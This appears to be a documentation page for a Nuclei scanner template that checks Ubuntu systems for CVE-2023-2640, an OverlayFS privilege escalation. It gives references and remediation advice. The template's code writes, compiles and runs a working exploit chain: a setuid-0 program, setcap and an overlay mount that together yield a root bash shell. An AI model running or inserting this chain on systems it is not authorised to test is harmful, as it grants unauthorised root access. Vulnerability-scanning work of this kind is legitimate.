GameOver(lay) - Local Privilege Escalation in Ubuntu Kernel
ID: CVE-2023-2640
Severity: high
Author: princechaddha
Tags: cve,cve2023,code,packetstorm,kernel,ubuntu,linux,privesc,local,canonical
Description
Section titled “Description”A local privilege escalation vulnerability has been discovered in the OverlayFS module of the Ubuntu kernel. This vulnerability could allow an attacker with local access to escalate their privileges, potentially gaining root-like access to the system.
YAML Source
Section titled “YAML Source”id: CVE-2023-2640
info: name: GameOver(lay) - Local Privilege Escalation in Ubuntu Kernel author: princechaddha severity: high description: | A local privilege escalation vulnerability has been discovered in the OverlayFS module of the Ubuntu kernel. This vulnerability could allow an attacker with local access to escalate their privileges, potentially gaining root-like access to the system. impact: | An attacker with local access can gain elevated privileges on the affected system. remediation: | Apply the latest security patches and updates provided by Ubuntu to fix the vulnerability. reference: - http://packetstormsecurity.com/files/174577/Kernel-Live-Patch-Security-Notice-LSN-0097-1.html - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2640 - https://www.wiz.io/blog/ubuntu-overlayfs-vulnerability - https://ubuntu.com/security/notices/USN-6250-1 - https://lists.ubuntu.com/archives/kernel-team/2023-July/140923.html classification: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2023-2640 cwe-id: CWE-863 epss-score: 0.00232 epss-percentile: 0.60636 cpe: cpe:2.3:o:canonical:ubuntu_linux:23.04:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: canonical product: ubuntu_linux shodan-query: cpe:"cpe:2.3:o:canonical:ubuntu_linux" tags: cve,cve2023,code,packetstorm,kernel,ubuntu,linux,privesc,local,canonical
self-contained: truecode: - engine: - sh - bash source: | id
- engine: - sh - bash source: | cd /tmp echo '#include <stdio.h>\n#include <stdlib.h>\n#include <unistd.h>\n\nint main() {\n if (setuid(0) != 0) {\n fprintf(stderr, "\\x1b[31mFailed to set UID to 0.\\x1b[0m\\n");\n return 1;\n }\n\n printf("Entering \\x1b[36mprivileged\\x1b[0m shell...\\n");\n if (system("/bin/bash -p") == -1) {\n fprintf(stderr, "\\x1b[31mFailed to execute /bin/bash -p.\\x1b[0m\\n");\n return 1;\n }\n\n return 0;\n}' > test.c gcc test.c -o test unshare -rm sh -c "mkdir -p l u w m && cp test l/ && setcap cap_setuid+eip l/test && mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/test && u/test && id;"
matchers: - type: dsl dsl: - '!contains(code_1_response, "(root)")' - 'contains(code_2_response, "(root)")' condition: and# digest: 4a0a00473045022100af1ce9e558408f86de2a92c299f2c032d05d4c87ca0b3b94e5372325c57a6247022018cc3e6806b89d0ab44dd51123fc94309a65fcb8b07605f505d528c67faa4862:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "code/cves/2023/CVE-2023-2640.yaml"